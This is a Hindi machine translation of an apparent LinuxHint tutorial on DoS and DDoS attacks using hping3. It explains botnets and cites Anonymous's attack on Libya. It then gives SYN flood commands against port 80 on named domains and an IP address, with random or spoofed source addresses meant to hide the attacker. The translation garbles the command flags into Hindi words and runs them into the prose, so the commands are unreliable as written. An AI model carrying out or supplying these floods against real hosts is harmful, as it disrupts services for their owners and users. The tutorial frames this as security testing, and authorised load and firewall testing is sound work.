डॉस अटैक
सेवा से इनकार (डॉस) हमला सेवाओं तक पहुंच को अस्वीकार करने के लिए एक बहुत ही सरल तकनीक है (इसीलिए इसे सेवा हमले से इनकार कहा जाता है)। इस हमले में लक्ष्य को बड़े आकार के पैकेट, या उनमें से एक बड़ी मात्रा के साथ ओवरलोड करना शामिल है।
हालांकि इस हमले को अंजाम देना बहुत आसान है, यह लक्ष्य की जानकारी या गोपनीयता से समझौता नहीं करता है, यह एक भेदक हमला नहीं है और इसका उद्देश्य केवल लक्ष्य तक पहुंच को रोकना है।
पैकेट की एक मात्रा भेजकर लक्ष्य हमलावरों को संभाल नहीं सकता है, सर्वर को वैध उपयोगकर्ताओं की सेवा करने से रोकता है।
डॉस हमले एक ही उपकरण से किए जाते हैं, इसलिए हमलावर आईपी को अवरुद्ध करके उन्हें रोकना आसान है, फिर भी हमलावर बदल सकता है और लक्ष्य आईपी पते को धोखा (क्लोन) भी कर सकता है लेकिन ऐसे हमलों से निपटने के लिए फायरवॉल के लिए मुश्किल नहीं है डीडीओएस हमलों के साथ जो होता है, उसके विपरीत।
डीडीओएस हमले
डिस्ट्रीब्यूटेड डेनियल ऑफ सर्विस अटैक (डीडीओएस) एक डॉस हमले के समान है, लेकिन एक साथ विभिन्न नोड्स (या विभिन्न हमलावरों) से किया जाता है। आमतौर पर डीडीओएस हमले बॉटनेट द्वारा किए जाते हैं। बॉटनेट स्वचालित स्क्रिप्ट या प्रोग्राम हैं जो कंप्यूटर को स्वचालित कार्य करने के लिए संक्रमित करते हैं (इस मामले में एक डीडीओएस हमला)। एक हैकर एक बॉटनेट बना सकता है और कई कंप्यूटरों को संक्रमित कर सकता है जिससे बॉटनेट डॉस हमले शुरू करेंगे, तथ्य यह है कि कई बॉटनेट एक साथ शूटिंग कर रहे हैं, डॉस हमले को डीडीओएस हमले में बदल देते हैं (इसीलिए इसे वितरित कहा जाता है)।
बेशक, ऐसे अपवाद हैं जिनमें डीडीओएस हमले वास्तविक मानव हमलावरों द्वारा किए गए थे, उदाहरण के लिए हैकर्स समूह बेनामी दुनिया भर में हजारों लोगों द्वारा एकीकृत इस तकनीक का उपयोग इसके आसान कार्यान्वयन के कारण बहुत बार किया जाता है (इसमें केवल स्वयंसेवकों की आवश्यकता होती है जिन्होंने अपना कारण साझा किया), यह उदाहरण के लिए है कि कैसे बेनामी ने आक्रमण के दौरान गद्दाफी की लीबिया सरकार को पूरी तरह से काट दिया, लीबिया राज्य को दुनिया भर के हजारों हमलावरों के सामने रक्षाहीन छोड़ दिया गया था।
इस प्रकार के हमले, जब कई अलग-अलग नोड्स से किए जाते हैं, तो उन्हें रोकना और रोकना बेहद मुश्किल होता है और आमतौर पर इससे निपटने के लिए विशेष हार्डवेयर की आवश्यकता होती है, ऐसा इसलिए है क्योंकि फायरवॉल और रक्षात्मक अनुप्रयोग एक साथ हजारों हमलावरों से निपटने के लिए तैयार नहीं हैं। यह hping3 का मामला नहीं है, इस उपकरण के माध्यम से किए गए अधिकांश हमलों को रक्षात्मक उपकरणों या सॉफ़्टवेयर द्वारा अवरुद्ध कर दिया जाएगा, फिर भी यह स्थानीय नेटवर्क में या खराब संरक्षित लक्ष्यों के विरुद्ध उपयोगी है।
hping3 . के बारे में
उपकरण hping3 आपको हेरफेर किए गए पैकेट भेजने की अनुमति देता है। यह उपकरण आपको लक्ष्य को अधिभारित करने और फायरवॉल को बायपास या हमला करने के लिए पैकेट के आकार, मात्रा और विखंडन को नियंत्रित करने की अनुमति देता है। Hping3 सुरक्षा या क्षमता परीक्षण उद्देश्यों के लिए उपयोगी हो सकता है, इसका उपयोग करके आप फ़ायरवॉल की प्रभावशीलता का परीक्षण कर सकते हैं और यदि कोई सर्वर बड़ी मात्रा में पैकेट को संभाल सकता है। नीचे आपको सुरक्षा परीक्षण उद्देश्यों के लिए hping3 का उपयोग करने के निर्देश मिलेंगे।
Hping3 का उपयोग करके DDOS हमलों के साथ शुरुआत करना:
डेबियन और आधारित लिनक्स वितरण पर आप चलकर hping3 स्थापित कर सकते हैं:
#उपयुक्तइंस्टॉलhping3-तथाएक साधारण डॉस (डीडीओएस नहीं) हमला होगा:
#सुडोhping3-एस --बाढ़ -वी -पी 80१७०.१५५.९.१८५कहा पे:
सुडो: hping3 चलाने के लिए आवश्यक विशेषाधिकार देता है।
hping3: hping3 प्रोग्राम को कॉल करता है।
-एस: SYN पैकेट निर्दिष्ट करता है।
-बाढ़: विवेक से गोली मारो, उत्तरों को नजरअंदाज कर दिया जाएगा (इसीलिए उत्तर नहीं दिखाए जाएंगे) और पैकेट जल्द से जल्द भेजे जाएंगे।
-वी: वर्बोसिटी।
-पी 80: पोर्ट 80, आप इस नंबर को उस सेवा के लिए बदल सकते हैं जिस पर आप हमला करना चाहते हैं।
१७०.१५५.९.१८५: लक्ष्य आईपी।
पोर्ट 80 के खिलाफ SYN पैकेट का उपयोग कर बाढ़:
निम्न उदाहरण lacampora.org के विरुद्ध SYN हमले को चित्रित करता है:
#सुडोhping3 lacampora.org-क्यू -एन -डी १२० -एस -पी 80 --बाढ़ --रैंड-स्रोतकहा पे:
लैकैम्पोरा.ओआरजी: लक्ष्य है
-क्यू: संक्षिप्त आउटपुट
-एन: मेजबान के बजाय लक्ष्य आईपी दिखाएं।
-डी 120: पैकेट का आकार सेट करें
-रैंड-स्रोत: आईपी पता छुपाएं।
निम्नलिखित उदाहरण एक और बाढ़ संभावित उदाहरण दिखाता है:
पोर्ट 80 के खिलाफ SYN बाढ़:
#सुडोhping3--रैंड-स्रोतivan.com-एस -क्यू -पी 80 --बाढ़Hping3 के साथ आप एक नकली आईपी के साथ अपने लक्ष्यों पर भी हमला कर सकते हैं, फ़ायरवॉल को बायपास करने के लिए आप अपने लक्ष्य आईपी को भी क्लोन कर सकते हैं, या किसी भी अनुमत पते को आप जान सकते हैं (उदाहरण के लिए आप इसे प्राप्त कर सकते हैं उदाहरण के लिए नैंप या स्थापित सुनने के लिए एक स्निफर के साथ सम्बन्ध)।
वाक्यविन्यास होगा:
#सुडोhping3-प्रति <नकली आईपी> <लक्ष्य> -एस -क्यू -पी 80 --और तेज -सी2इस व्यावहारिक उदाहरण में हमला प्रतीत होगा:
#सुडोhping3-प्रति190.0.175.100 190.0.175.100-एस -क्यू -पी 80 --और तेज -सी2मुझे आशा है कि आपको hping3 पर यह ट्यूटोरियल उपयोगी लगा होगा। Linux और नेटवर्किंग पर अधिक युक्तियों और अपडेट के लिए LinuxHint का अनुसरण करते रहें।